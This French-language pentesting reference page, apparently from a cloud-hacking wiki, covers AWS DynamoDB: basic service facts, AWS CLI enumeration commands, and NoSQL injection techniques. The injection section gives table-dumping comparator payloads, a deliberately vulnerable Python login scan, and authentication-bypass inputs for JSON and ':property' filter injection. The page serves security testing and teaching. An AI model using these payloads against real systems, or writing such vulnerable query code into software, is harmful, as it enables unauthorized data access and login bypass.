AWS - DynamoDB Enum

DynamoDB

Basic Information

Amazon DynamoDB est présenté par AWS comme une base de données NoSQL clé-valeur, entièrement gérée et sans serveur, conçue pour alimenter des applications haute performance, quelle que soit leur taille. Le service garantit des fonctionnalités robustes, y compris des mesures de sécurité inhérentes, des sauvegardes ininterrompues, une réplication automatisée à travers plusieurs régions, un cache en mémoire intégré et des utilitaires d'exportation de données pratiques.

Dans le contexte de DynamoDB, au lieu d'établir une base de données traditionnelle, des tables sont créées. Chaque table nécessite la spécification d'une clé de partition comme composant intégral de la clé primaire de la table. Cette clé de partition, essentiellement une valeur de hachage, joue un rôle critique tant dans la récupération des éléments que dans la distribution des données à travers divers hôtes. Cette distribution est essentielle pour maintenir à la fois la scalabilité et la disponibilité de la base de données. De plus, il existe une option pour incorporer une clé de tri afin de raffiner davantage l'organisation des données.

Encryption

Par défaut, DynamoDB utilise une clé KMS qui appartient à Amazon DynamoDB, pas même la clé gérée par AWS qui appartient au moins à votre compte.

Backups & Export to S3

Il est possible de programmer la génération de sauvegardes de table ou de les créer à la demande. De plus, il est également possible d'activer la récupération à un instant donné (PITR) pour une table. La récupération à un instant donné fournit des sauvegardes continues de vos données DynamoDB pendant 35 jours pour vous aider à vous protéger contre des opérations d'écriture ou de suppression accidentelles.

Il est également possible d'exporter les données d'une table vers S3, mais la table doit avoir PITR activé.

GUI

Il existe une interface graphique pour les services Dynamo locaux comme DynamoDB Local, dynalite, localstack, etc., qui pourrait être utile : https://github.com/aaronshaf/dynamodb-admin

Enumeration

# Tables
aws dynamodb list-tables
aws dynamodb describe-table --table-name <t_name> #Get metadata info
## The primary key and sort key will appear inside the KeySchema field

#Check if point in time recovery is enabled
aws dynamodb describe-continuous-backups \
--table-name tablename

# Backups
aws dynamodb list-backups
aws dynamodb describe-backup --backup-arn <arn>
aws dynamodb describe-continuous-backups --table-name <t_name>

# Global tables
aws dynamodb list-global-tables
aws dynamodb describe-global-table --global-table-name <name>

# Exports
aws dynamodb list-exports
aws dynamodb describe-export --export-arn <arn>

# Misc
aws dynamodb describe-endpoints #Dynamodb endpoints

Accès non authentifié

Privesc

Post Exploitation

Persistance

Injection DynamoDB

Injection SQL

Il existe des moyens d'accéder aux données DynamoDB avec la syntaxe SQL, donc, des injections SQL typiques sont également possibles.

Injection NoSQL

Dans DynamoDB, différentes conditions peuvent être utilisées pour récupérer des données, comme dans une injection NoSQL classique. S'il est possible de chaîner plus de conditions pour récupérer des données, vous pourriez obtenir des données cachées (ou vider toute la table). Vous pouvez trouver ici les conditions prises en charge par DynamoDB : https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html

Notez que différentes conditions sont prises en charge si les données sont accessibles via query ou via scan.

Si vous pouvez modifier la comparaison effectuée ou en ajouter de nouvelles, vous pourriez récupérer plus de données.

# Comparators to dump the database
"NE": "a123" #Get everything that doesn't equal "a123"
"NOT_CONTAINS": "a123" #What you think
"GT": " " #All strings are greater than a space

Injection Json brute

DynamoDB accepte des objets Json pour rechercher des données dans la base de données. Si vous constatez que vous pouvez écrire dans l'objet json envoyé pour la recherche, vous pourriez faire un dump de la base de données, tout le contenu.

Par exemple, en injectant dans une requête comme :

'{"Id": {"ComparisonOperator": "EQ","AttributeValueList": [{"N": "' + user_input + '"}]}}'

un attaquant pourrait injecter quelque chose comme :

1000"}],"ComparisonOperator": "GT","AttributeValueList": [{"N": "0

corriger la condition "EQ" en recherchant l'ID 1000 et ensuite en cherchant toutes les données avec une chaîne Id supérieure à 0, ce qui est tout.

Un exemple vulnérable utilisant une connexion pourrait être :

scan_filter = """{
"username": {
"ComparisonOperator": "EQ",
"AttributeValueList": [{"S": "%s"}]
},
"password": {
"ComparisonOperator": "EQ",
"AttributeValueList": [{"S": "%s"}]
}
}
""" % (user_data['username'], user_data['password'])

dynamodb.scan(TableName="table-name", ScanFilter=json.loads(scan_filter))

Cela serait vulnérable à :

username: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none
password: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none

:property Injection

Certain SDKs permettent d'utiliser une chaîne indiquant le filtrage à effectuer comme :

new ScanSpec().withProjectionExpression("UserName").withFilterExpression(user_input+" = :username and Password = :password").withValueMap(valueMap)

Vous devez savoir que la recherche dans DynamoDB pour substituer une valeur d'attribut dans des expressions de filtre lors de la numérisation des éléments, les jetons doivent commencer par le caractère :. De tels jetons seront remplacés par la véritable valeur d'attribut à l'exécution.

Par conséquent, une connexion comme la précédente peut être contournée avec quelque chose comme :

:username = :username or :username
# This will generate the query:
# :username = :username or :username = :username and Password = :password
# which is always true